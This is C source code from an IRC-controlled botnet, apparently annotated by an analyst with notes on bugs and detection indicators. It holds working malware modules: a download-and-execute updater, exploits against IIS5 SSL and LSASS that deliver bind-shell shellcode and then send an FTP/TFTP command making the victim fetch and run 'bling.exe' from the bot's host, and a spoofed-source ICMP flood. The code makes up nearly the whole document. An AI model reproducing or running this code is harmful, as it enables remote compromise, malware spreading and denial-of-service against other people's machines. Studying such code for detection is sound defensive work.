            sprintf(buffer,"Workstations: %S",pBuf->usri11_workstations);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Country Code: %d",pBuf->usri11_country_code);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"User's Language: %d",pBuf->usri11_code_page);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Max. Storage: %d",pBuf->usri11_max_storage);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
            sprintf(buffer,"Units Per Week: %d",pBuf->usri11_units_per_week);
            irc_privmsg(sock,chan,buffer,notice,TRUE);
        }
    } else {
        // IRC colour/bold control bytes around "net" are part of the bot's output format
        sprintf(buffer,"-\x03\x34\2net\2\x03- user info error <%ld>",nStatus);
        irc_privmsg(sock,chan,buffer,notice);
    }
    if (pBuf != NULL) fNetApiBufferFree(pBuf);
    return (nStatus);
}
/*
 * Thread body for the bot's download / update command.
 *
 * Fetches dl.url through WinINet (handle ih, opened elsewhere), writes the
 * body to dl.dest, optionally XOR-decodes it (dl.encrypted -> Xorbuff) and
 * validates it against an expected length (dl.filelen) and a CRC32 of the
 * written file (dl.expectedcrc -> crc32f).  A good file is then either
 * launched with ShellExecute (dl.run) or, in update mode (dl.update == 1),
 * started hidden with CreateProcess after which the bot calls uninstall()
 * and ExitProcess() to replace itself.
 *
 * param points at a DOWNLOAD record copied by value; gotinfo is set so the
 * spawner can reuse it.  Every path ends in clearthread() + ExitThread().
 *
 * Analyst notes:
 *  - fileTotBuff (512000 bytes) is filled with the first part of the
 *    download but no code here reads it back; it is allocated (unchecked
 *    malloc) and freed without further use.
 *  - The return value of fInternetReadFile() is not checked and r is only
 *    ever written by that call.
 *  - On a failed length/CRC check the function jumps to badfile; the
 *    partially written dl.dest is left on disk.
 *  - The "Couldn't open file" path exits the thread without closing fh.
 *  - Several status strings are Italian ("CRC Fallito", "Apro Il File",
 *    "Updato", "Update Fallito", "Link o DnS Non Trovato ..."); together
 *    with the "[DOWNLOAD]:" prefix they are distinctive log/IoC strings.
 */
DWORD WINAPI DownloadThread(LPVOID param)
{
    char buffer[IRCLINE];
    DWORD r, d, start, total, speed;
    DOWNLOAD dl = *((DOWNLOAD *)param);
    DOWNLOAD *dls = (DOWNLOAD *)param;
    dls->gotinfo = TRUE;   // signal the spawner that its record has been copied
    HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
    if (fh != NULL) {
        // open (and truncate) the destination file
        HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
        // make sure that our file handle is valid
        if (f < (HANDLE)1) {
            sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
            if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
            addlog(buffer);
            clearthread(dl.threadnum);
            ExitThread(0);;
        }
        total = 0;
        start = GetTickCount();
        // FIX ME: only the first 500 kb are kept in memory; nothing below consumes this buffer
        char *fileTotBuff=(char *)malloc(512000);
        do {
            memset(buffer, 0, sizeof(buffer));
            fInternetReadFile(fh, buffer, sizeof(buffer), &r);   // r = bytes read this chunk
            if (dl.encrypted) Xorbuff(buffer,r);                 // optional XOR decode of the payload
            WriteFile(f, buffer, r, &d, NULL);
            if ((total) < 512000) {
                // still room in the 512000-byte in-memory copy: copy min(remaining, r)
                unsigned int bytestocopy;
                bytestocopy=512000-total;
                if (bytestocopy>r) bytestocopy=r;
                memcpy(&fileTotBuff[total],buffer,bytestocopy);
            }
            total+=r;
            // stop early if the download exceeds the announced length
            if (dl.filelen) if (total>dl.filelen) break;
            // progress is published through the thread table's name field
            if (dl.update != 1)
                sprintf(threads[dl.threadnum].name, "[Download]: Download: %s (%dKB transferred).", dl.url, total / 1024);
            else
                sprintf(threads[dl.threadnum].name, "[Download]: Update: %s (%dKB transferred).", dl.url, total / 1024);
        } while (r > 0);
        BOOL goodfile=TRUE;
        // length check (only when the command supplied a length)
        if (dl.filelen) {
            if (total!=dl.filelen) {
                goodfile=FALSE;
                sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
                irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
                addlog(buffer);
            }
        }
        speed = total / (((GetTickCount() - start) / 1000) + 1);   // +1 avoids dividing by zero
        CloseHandle(f);
        free(fileTotBuff);
        // CRC check is done over the file on disk, not the in-memory copy
        if (dl.expectedcrc) {
            unsigned long crc=crc32f(dl.dest);
            if (crc!=dl.expectedcrc) {
                goodfile=FALSE;
                sprintf(buffer,"[DOWNLOAD]: CRC Fallito (%d != %d).", crc, dl.expectedcrc);
                irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
                addlog(buffer);
            }
        }
        if (goodfile==FALSE) goto badfile;
        // download isn't an update
        if (dl.update != 1) {
            sprintf(buffer, "[DOWNLOAD]: D0S Downloaded %.1f KB in %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
            if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
            addlog(buffer);
            if (dl.run == 1) {
                // execute the downloaded file via the shell
                fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
                if (!dl.silent) {
                    sprintf(buffer,"[DOWNLOAD]: Apro Il File : %s.",dl.dest);
                    irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
                    addlog(buffer);
                }
            }
        // download is an update
        } else {
            sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB in %s @ %.1fKB/sec. Updato.", total / 1024.0, dl.dest, speed / 1024.0);
            if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
            addlog(buffer);
            // start the new binary hidden and detached, then remove this instance
            PROCESS_INFORMATION pinfo;
            STARTUPINFO sinfo;
            memset(&pinfo, 0, sizeof(pinfo));
            memset(&sinfo, 0, sizeof(sinfo));
            sinfo.lpTitle = "";
            sinfo.cb = sizeof(sinfo);
            sinfo.dwFlags = STARTF_USESHOWWINDOW;
            sinfo.wShowWindow = SW_HIDE;
            if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
                fWSACleanup();
                uninstall();
                ExitProcess(EXIT_SUCCESS);
            } else {
                sprintf(buffer,"[DOWNLOAD]: Update Fallito: Errore Nell'Apertura Del File: %s.",dl.dest);
                if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
                addlog(buffer);
            }
        }
    } else {
        sprintf(buffer,"[DOWNLOAD]: Link o DnS Non Trovato SUKKIAMELO!: %s.",dl.url);
        if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
        addlog(buffer);
    }
badfile:
    fInternetCloseHandle(fh);
    clearthread(dl.threadnum);
    ExitThread(0);
}
/*
 * Thread body for the bot's "visit" command: performs one HTTP request to
 * visit.host (with visit.referer as the Referer header) via WinINet and
 * reports "[VISIT]: ..." to the IRC channel.
 *
 * The URL is split with InternetCrackUrl() into host, port, user name,
 * password and path, which are copied into fixed-size local buffers.  The
 * do { ... } while(0) is a single-pass block so that every failure can
 * `break` to the shared reporting/cleanup code at the bottom.
 *
 * Analyst notes:
 *  - The strncpy() calls are bounded by the component length reported by
 *    InternetCrackUrl(), not by the destination buffer size (128/128/128/256
 *    bytes), so an over-long URL component overruns the stack buffer.
 *  - The response body is never read; the request is sent and the result
 *    of HttpSendRequest() alone decides the status line.
 *  - ch/req may still be 0 when fInternetCloseHandle() is called on them.
 */
DWORD WINAPI visit(LPVOID param)
{
    HINTERNET ch = 0, req = 0;
    const char *accept = "*/*";
    char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];
    vs visit = *((vs *)param);
    vs *vsp = (vs *)param;
    vsp->gotinfo = TRUE;   // signal the spawner that its record has been copied
    // zero out string variables
    memset(vhost, 0, sizeof(vhost));
    memset(vuser, 0, sizeof(vuser));
    memset(vpass, 0, sizeof(vpass));
    memset(vpath, 0, sizeof(vpath));
    // zero out url structure and set options; length 1 asks InternetCrackUrl to return pointers into the input
    URL_COMPONENTS url;
    memset(&url, 0, sizeof(url));
    url.dwStructSize = sizeof(url);
    url.dwHostNameLength = 1;
    url.dwUserNameLength = 1;
    url.dwPasswordLength = 1;
    url.dwUrlPathLength = 1;
    do {
        // crack the url (break it into its main parts)
        if (!fInternetCrackUrl(visit.host, strlen(visit.host), 0, &url)) {
            sprintf(sendbuf,"[VISIT]: Invalid URL.");
            break;
        }
        // copy url parts into variables (bounded by component length, not destination size)
        if (url.dwHostNameLength > 0) strncpy(vhost, url.lpszHostName, url.dwHostNameLength);
        int vport = url.nPort;
        if (url.dwUserNameLength > 0) strncpy(vuser, url.lpszUserName, url.dwUserNameLength);
        if (url.dwPasswordLength > 0) strncpy(vpass, url.lpszPassword, url.dwPasswordLength);
        if (url.dwUrlPathLength > 0) strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);
        ch = fInternetConnect(ih, vhost,(unsigned short)vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
        if (ch == NULL) {
            sprintf(sendbuf,"[VISIT]: Could not open a connection.");
            break;
        }
        // NULL verb -> GET; INTERNET_FLAG_NO_UI suppresses any dialogs
        req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.referer, &accept, INTERNET_FLAG_NO_UI, 0);
        if (req == NULL) {
            sprintf(sendbuf,"[VISIT]: Failed to connect to HTTP server.");
            break;
        }
        if (fHttpSendRequest(req, NULL, 0, NULL, 0))
            sprintf(sendbuf,"[VISIT]: URL visited.");
        else
            sprintf(sendbuf,"[VISIT]: Failed to get requested URL from HTTP server.");
    } while(0); // always false, so this never loops, only helps make error handling easier
    if (!visit.silent) irc_privmsg(visit.sock, visit.chan, sendbuf, visit.notice);
    addlog(sendbuf);
    fInternetCloseHandle(ch);
    fInternetCloseHandle(req);
    clearthread(visit.threadnum);
    ExitThread(0);
}
/*
 * Exploit module aimed at the IIS 5 SSL (PCT) service on exinfo.ip:exinfo.port.
 *
 * Because the remote OS is not fingerprinted here, the function iterates over
 * a table of seven hard-coded addresses (labelled Win2K SP0-SP4, WinXP SP0-SP1
 * by the original author) and, for each one, connects, sends the request
 * buffer, then tries to connect back to TCP port 1981 where the payload's
 * listener is expected.  On that second connection it sends a command that
 * makes the victim fetch "bling.exe" from the bot's own host over FTP (or
 * TFTP when NO_TFTPD is not defined -- note both blocks are compiled unless
 * the macros are set, and the FTP one is written last, so it wins).
 *
 * Returns TRUE once the command was sent and the "Exploiting IP:" line has
 * been posted/logged; FALSE otherwise.  jumper, bind_shell_code, shellcode,
 * filename, FTP_PORT and exploit[] are file-level names not visible here.
 *
 * Analyst / detection notes:
 *  - Network pattern: connection to the target's SSL port, followed by a
 *    connection from the attacker to target port 1981, followed by the
 *    target fetching a file from the attacker's FTP_PORT.
 *  - badbuffer (347 bytes, unchecked malloc) is never freed, and p is
 *    appended to on every loop iteration rather than rebuilt.
 *  - Before sending the command, the code blocks on a read from
 *    exinfo.sock (the IRC socket), not from sSock.
 *  - The table element count is computed with sizeof(LPTSTR), which only
 *    matches sizeof(unsigned long) on a 32-bit build.
 */
BOOL IIS5SSL(EXINFO exinfo)
{
    char buffer[IRCLINE];
    char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
    unsigned long XOR=0xffffffff;   // each offset is stored inverted and un-XORed before use
    unsigned long offsets[] = {
        0x6741a1cd, // Win2K SP0
        0x6741a199, // Win2K SP1
        0x6741a426, // Win2K SP2
        0x67419e1d, // Win2K SP3
        0x67419ce8, // Win2K SP4
        0x0ffb7de9, // WinXP SP0
        0x0ffb832f  // WinXP SP1
    };
    BOOL bRet = FALSE;
    unsigned char *badbuffer=(unsigned char*)malloc(347);
    memset(badbuffer, 0, 347);
    unsigned char *p=badbuffer;
    // fixed request header, then the file-level payload fragments appended as C strings
    memcpy(p, request, sizeof(request));
    p+=sizeof(request)-1;
    strcat((char*)p, jumper);
    strcat((char*)p, bind_shell_code);
    SOCKET sSock;
    if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
        SOCKADDR_IN ssin;
        // FIX ME: since i didnt found a way to determine the remote OS, i
        // placed this all together in a loop. this aint the best way
        // i'm sure about that
        for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
            memset(&ssin, 0, sizeof(ssin));
            ssin.sin_family = AF_INET;
            ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
            ssin.sin_port = fhtons(exinfo.port);
            if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
                // append this iteration's address and the remaining payload to p
                offsets[i]^=XOR;
                strncat((char*)p, (char*)&offsets[i], 4);
                strcat((char*)p, shellcode);
                if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) {
                    Sleep(1000);
                    fclosesocket(sSock);
                    // second connection: the payload's listener on port 1981
                    memset(&ssin, 0, sizeof(ssin));
                    ssin.sin_family = AF_INET;
                    ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
                    ssin.sin_port = fhtons(1981);
                    if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
                        char cmd_buff[400];
                        // both variants are compiled unless the macro is defined; the later one overwrites cmd_buff
#ifndef NO_TFTPD
                        _snprintf(cmd_buff, sizeof (cmd_buff), "tftp -i %s get %s\r\n", GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
                        _snprintf(cmd_buff, sizeof (cmd_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT);
#endif
                        // reads from the IRC socket, not the exploit socket, before sending the command
                        if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
                            Sleep(500);
                            if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
                                fclosesocket(sSock);
                                bRet = TRUE;
                                _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
                                if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
                                addlog(buffer);
                                break;
                            }
                        }
                    }
                }
            }
            fclosesocket(sSock);
        }
    }
    return (bRet);
}
/*
 * Exploit module against the LSASS service reached over SMB on
 * exinfo.ip:exinfo.port.
 *
 * Flow, as visible in this body:
 *  1. FpHost(exinfo.ip, FP_RPC) fingerprints the host; OS_UNKNOWN and
 *     OS_WINNT abort with FALSE.  OS_WINXP selects target 0; anything else
 *     picks target 1 (9 times in 10) or 2 at random.  Per-target data
 *     (jmpaddr) comes from the file-level ttargetx[] table.
 *  2. The UNC path "\\<ip>\ipc$" is widened to UTF-16LE and spliced into a
 *     copy of the file-level SMB request reqx4, with its length bytes patched.
 *  3. The file-level bindshell payload is patched in place at offset 176
 *     with (LSASS_BSPORT ^ 0x9999) -- this modifies a global, so it is not
 *     thread-safe.
 *  4. A sequence of SMB requests reqx1..reqx6, then reqx7 (XP) or
 *     reqx8+reqx9 (targets 1/2), is sent; every frecv() result is stored in
 *     `len` and ignored.
 *  5. A second socket connects to exinfo.ip:LSASS_BSPORT; if anything is
 *     received there, an FTP-script command to fetch "bling.exe" from the
 *     bot's own host (GetIP, FTP_PORT) is sent and the function returns TRUE
 *     after posting/logging "[<name>]: Exploiting IP: <ip>." and bumping
 *     exploit[exinfo.exploit].stats.
 *
 * Returns TRUE only on that final path; every other failure returns FALSE
 * (sockets are closed on the paths that opened them).
 *
 * Detection notes: SMB session to the target, then a connection from the
 * attacker to target port LSASS_BSPORT, then the target fetching a file via
 * "ftp -n -s:o" from the attacker.  smblen/unclen are `char`, so the patched
 * length bytes are limited to what fits in a signed byte.
 */
BOOL lsass2(EXINFO exinfo)
{
    int i, targetx, len, targetxOS;
    char hostipc[40];
    char hostipc2[40*2];        // hostipc widened to UTF-16LE
    char buf[LEN+1];
    char sendbuf[(LEN+1)*2];    // buf widened to UTF-16LE
    char req4u[sizeof(reqx4)+20];
    char screq[BUFSIZE+sizeof(reqx7)+1500+440];
    char screq2k[4348+4060];
    char screq2k2[4348+4060];
    char recvbuf[1600];
    char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
    char strBuffer[BUFSIZE];
    char buffer[IRCLINE], cmd_buff[400];
    char smblen;
    char unclen;
    unsigned short port;
    SOCKET sSocket, bSocket;
    SOCKADDR_IN ssin, bsin;
    // fingerprint first; unknown and NT hosts are skipped
    targetxOS = FpHost(exinfo.ip, FP_RPC);
    if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT)) return FALSE;
    if (targetxOS == OS_WINXP) targetx = 0;
    else if (rand() % 10) targetx = 1;
    else targetx = 2;
    // build "\\<ip>\ipc$" and its UTF-16LE form
    _snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
    for (i=0; i<40; i++) {
        hostipc2[i*2] = hostipc[i];
        hostipc2[i*2+1] = 0;
    }
    // splice the UNC path into a copy of reqx4 and patch its length bytes
    memcpy(req4u, reqx4, sizeof(reqx4)-1);
    memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
    memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
    smblen = 52+(char)strlen(hostipc)*2;
    memcpy(req4u+3, &smblen, 1);
    unclen = 9 + (char)strlen(hostipc)*2;
    memcpy(req4u+45, &unclen, 1);
    // patch the listener port into the shared bindshell payload (global, modified in place)
    port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
    memcpy(&bindshell[176], &port, 2);
    if ((targetx == 1) || (targetx == 2)) {
        // targets 1/2: payload laid out in buf, then widened into sendbuf
        memset(buf, NOP, LEN);
        memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
        memcpy(&buf[2036], &bindshell, strlen(bindshell));
        memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
        memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
        memcpy(&buf[2856], &bindshell, strlen(bindshell));
        for (i=0; i<LEN; i++) {
            sendbuf[i*2] = buf[i];
            sendbuf[i*2+1] = 0;
        }
        sendbuf[LEN*2]=0;
        sendbuf[LEN*2+1]=0;
        memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
        memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
    } else {
        // target 0 (XP): payload laid out in strBuffer
        memset(strBuffer, NOP, BUFSIZE);
        memcpy(strBuffer+160, bindshell, strlen(bindshell));
        memcpy(strBuffer+1980, strasm, strlen(strasm));
        *(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
    }
    memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
    if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR) return FALSE;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = fhtons((unsigned short)exinfo.port);
    ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
    if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
        fclosesocket(sSocket);
        return FALSE;
    }
    // SMB negotiation / session setup sequence; replies are read into recvbuf and not inspected
    if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    len = frecv(sSocket, recvbuf, 1600, 0);
    if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    len = frecv(sSocket, recvbuf, 1600, 0);
    if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    len = frecv(sSocket, recvbuf, 1600, 0);
    if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    len = frecv(sSocket, recvbuf, 1600, 0);
    if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    len = frecv(sSocket, recvbuf, 1600, 0);
    if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    len = frecv(sSocket, recvbuf, 1600, 0);
    if ((targetx == 1) || (targetx == 2)) {
        // targets 1/2: payload split across two requests (reqx8, reqx9) with the shitx3 trailer
        memcpy(screq2k, reqx8, sizeof(reqx8)-1);
        memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
        memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
        memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
        memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
        if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
            fclosesocket(sSocket);
            return FALSE;
        }
        len = frecv(sSocket, recvbuf, 1600, 0);
        if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
            fclosesocket(sSocket);
            return FALSE;
        }
    } else {
        // target 0: single request reqx7 + strBuffer + shitx1 trailer
        memcpy(screq, reqx7, sizeof(reqx7)-1);
        memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
        memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
        screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
        if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
            fclosesocket(sSocket);
            return FALSE;
        }
    }
    len = frecv(sSocket, recvbuf, 1600, 0);
    // second connection: the payload's listener on LSASS_BSPORT
    if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    memset(&bsin, 0, sizeof(bsin));
    bsin.sin_family = AF_INET;
    bsin.sin_port = fhtons(LSASS_BSPORT);
    bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
    if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
        fclosesocket(sSocket);
        fclosesocket(bSocket);
        return FALSE;
    }
    if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
        Sleep(500);
        // command executed on the victim: fetch bling.exe from the bot's FTP_PORT and run it
        _snprintf(cmd_buff, sizeof(cmd_buff),
            "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT);
        if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
            fclosesocket(sSocket);
            fclosesocket(bSocket);
            return FALSE;
        }
        fclosesocket(sSocket);
        fclosesocket(bSocket);
        _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
        if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
        addlog(buffer);
        exploit[exinfo.exploit].stats++;
        return TRUE;
    } else
        return FALSE;   // note: neither socket is closed on this path
}
/*
 * Thread body for the bot's "icmp flood" command.
 *
 * For icmpflood.time seconds it sends hand-built IP+ICMP packets
 * (ECHOREQUEST, defined elsewhere) to icmpflood.ip through a raw socket with
 * IP_HDRINCL, then posts a summary line to IRC and terminates the thread.
 *
 * param points at an ICMPFLOOD record copied by value; gotinfo is set so the
 * spawner can reuse it.  Every exit path ends in clearthread() + ExitThread().
 *
 * Analyst notes (observable from this body):
 *  - spoof != 0 puts a random 32-bit source address in every packet;
 *    otherwise the host's own address (GetIP) is used.
 *  - ICMP type and code are random (0..255) per packet, id is random in
 *    [1,240], seq is always 1, and the data area is filled with one random
 *    byte value -- this is not a well-formed echo request stream.
 *  - echo_req is a `static` local, so concurrent ICMP flood threads share
 *    (and race on) the same packet buffer.
 *  - szSendBuf (60 bytes) is never transmitted; it is only used for the
 *    KB/sec figure in the summary, while sizeof(ECHOREQUEST) bytes are sent.
 *  - Unlike TcpFloodThread, error paths here do not call addlog(), and
 *    ssock is not closed on the setsockopt()/invalid-IP paths.
 */
DWORD WINAPI ICMPFloodThread(LPVOID param)
{
    ICMPFLOOD icmpflood = *((ICMPFLOOD *)param);
    ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param;
    icmpfloods->gotinfo = TRUE;   // signal the spawner that its record has been copied
    char sendbuf[IRCLINE], szSendBuf[60]={0};
    static ECHOREQUEST echo_req;  // static: shared across all threads running this function
    SOCKET ssock;
    if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
        sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
        if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
        clearthread(icmpflood.threadnum);
        ExitThread(0);
    }
    // IP_HDRINCL: the kernel must not prepend its own IP header
    BOOL flag = TRUE;
    if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
        sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
        if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
        clearthread(icmpflood.threadnum);
        ExitThread(0);
    }
    if (finet_addr(icmpflood.ip) == INADDR_NONE) {
        sprintf(sendbuf,"[ICMP]: Invalid target IP.");
        if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
        clearthread(icmpflood.threadnum);
        ExitThread(0);
    }
    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family=AF_INET;
    ssin.sin_port=fhtons(0);
    ssin.sin_addr.s_addr=finet_addr(icmpflood.ip);
    int sent = 0;
    unsigned long start = GetTickCount();
    // run until icmpflood.time whole seconds have elapsed
    while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) {
        // IP header: version 4, IHL in 32-bit words, TTL 128, protocol ICMP
        echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long));
        echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST));
        echo_req.ipHeader.ident=1;
        echo_req.ipHeader.frag_and_flags=0;
        echo_req.ipHeader.ttl=128;
        echo_req.ipHeader.proto=IPPROTO_ICMP;
        echo_req.ipHeader.checksum=0;
        // spoof: random source address per packet; else the bot host's own IP
        echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock))));
        echo_req.ipHeader.destIP=ssin.sin_addr.s_addr;
        // random ICMP type/code, id in [1,240], seq fixed at 1; ICMP checksum left at 0
        echo_req.icmpHeader.type = rand()%256;
        echo_req.icmpHeader.subcode = rand()%256;
        echo_req.icmpHeader.id = (rand() % 240) + 1;
        echo_req.icmpHeader.checksum = 0;
        echo_req.icmpHeader.seq = 1;
        // fill the packet data with a random character..
        memset(echo_req.cData, rand()%255, sizeof(echo_req.cData));
        if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) {
            fclosesocket(ssock);
            _snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError());
            if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
            clearthread(icmpflood.threadnum);
            ExitThread(0);
        }
        sent++;
    }
    fclosesocket(ssock);
    // summary: throughput uses sizeof(szSendBuf) (60), not the size actually sent
    sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
    if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
    clearthread(icmpflood.threadnum);
    ExitThread(0);
}